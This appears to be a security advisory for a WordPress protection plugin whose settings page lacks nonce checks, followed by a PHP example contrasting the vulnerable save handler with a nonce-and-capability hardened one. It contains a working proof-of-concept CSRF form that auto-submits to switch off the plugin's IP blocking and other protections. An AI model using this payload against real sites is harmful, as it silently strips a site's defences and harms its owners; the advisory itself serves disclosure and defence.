The plugin does not use nonces when saving its settings, making it possible for attackers to conduct CSRF attacks. This could allow attackers to disable the plugin's protections.
<form id="test" action="https://example.com/wp-admin/admin.php?page=lbsa_home" method="post">
  <input type="text" name="savelbsa" value="1">
  <input type="text" name="onlyfront" value="0">
  <input type="text" name="checkwp" value="0">
  <input type="text" name="namespaces" value="GET">
  <input type="text" name="levelLFI" value="50">
  <input type="text" name="sendnotification" value="0">
  <input type="text" name="sendto" value="">
  <input type="text" name="raiseerror" value="0">
  <input type="text" name="redirurl" value="https://google.com">
  <input type="text" name="errorcode" value="">
  <input type="text" name="errormsg" value="">
  <input type="text" name="ipblock" value="0">
  <input type="text" name="ipblocktime" value="222">
  <input type="text" name="ipblockcount" value="666666666">
</form>
<script>
  document.getElementById("test").submit();
</script>
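For contrast, an added example (not the plugin's own code) of a hypothetical settings handler in the pattern described above beside the hardened form that WordPress provides for this: a nonce tied to the action plus a capability check. The function names, the `lbsa_save_settings` action, the `lbsa_nonce` field and the `lbsa_*` option names are assumptions; only the POST parameter names come from the proof of concept.

```php
<?php
// Added example, not the plugin's code. Function names, the nonce action
// 'lbsa_save_settings', the field 'lbsa_nonce' and the lbsa_* option names
// are hypothetical; the POST parameter names match the proof of concept.

// Missing-nonce pattern: any POST carrying savelbsa=1 is honoured, so a form
// auto-submitted from a third-party page in an administrator's browser
// silently rewrites the settings.
function lbsa_save_settings_unprotected() {
    if ( ! isset( $_POST['savelbsa'] ) ) {
        return;
    }
    update_option( 'lbsa_ipblock',      $_POST['ipblock'] );
    update_option( 'lbsa_ipblockcount', $_POST['ipblockcount'] );
    update_option( 'lbsa_redirurl',     $_POST['redirurl'] );
}

// Hardened pattern: the request must carry a nonce bound to this action and
// to the current user's session, and the user must be allowed to change options.
function lbsa_save_settings_hardened() {
    if ( ! isset( $_POST['savelbsa'] ) ) {
        return;
    }
    // check_admin_referer() calls wp_die() when the nonce is absent or invalid;
    // a cross-site form cannot obtain a valid nonce, so the save never runs.
    check_admin_referer( 'lbsa_save_settings', 'lbsa_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Coerce each value to its expected type rather than storing raw input.
    update_option( 'lbsa_ipblock',      empty( $_POST['ipblock'] ) ? 0 : 1 );
    update_option( 'lbsa_ipblockcount', absint( $_POST['ipblockcount'] ?? 0 ) );
    update_option( 'lbsa_redirurl',     esc_url_raw( wp_unslash( $_POST['redirurl'] ?? '' ) ) );
}
add_action( 'admin_init', 'lbsa_save_settings_hardened' );

// The legitimate settings form must emit the matching nonce field, otherwise
// the hardened handler rejects the plugin's own submissions too.
function lbsa_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=lbsa_home' ) ); ?>">
        <?php wp_nonce_field( 'lbsa_save_settings', 'lbsa_nonce' ); ?>
        <input type="hidden" name="savelbsa" value="1">
        <label><input type="checkbox" name="ipblock" value="1"> Enable IP blocking</label>
        <input type="number" name="ipblockcount" value="<?php echo absint( get_option( 'lbsa_ipblockcount', 0 ) ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}
```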
Daniel Ruf
Daniel Ruf
Yes
2022-09-29
2022-09-29
2022-11-15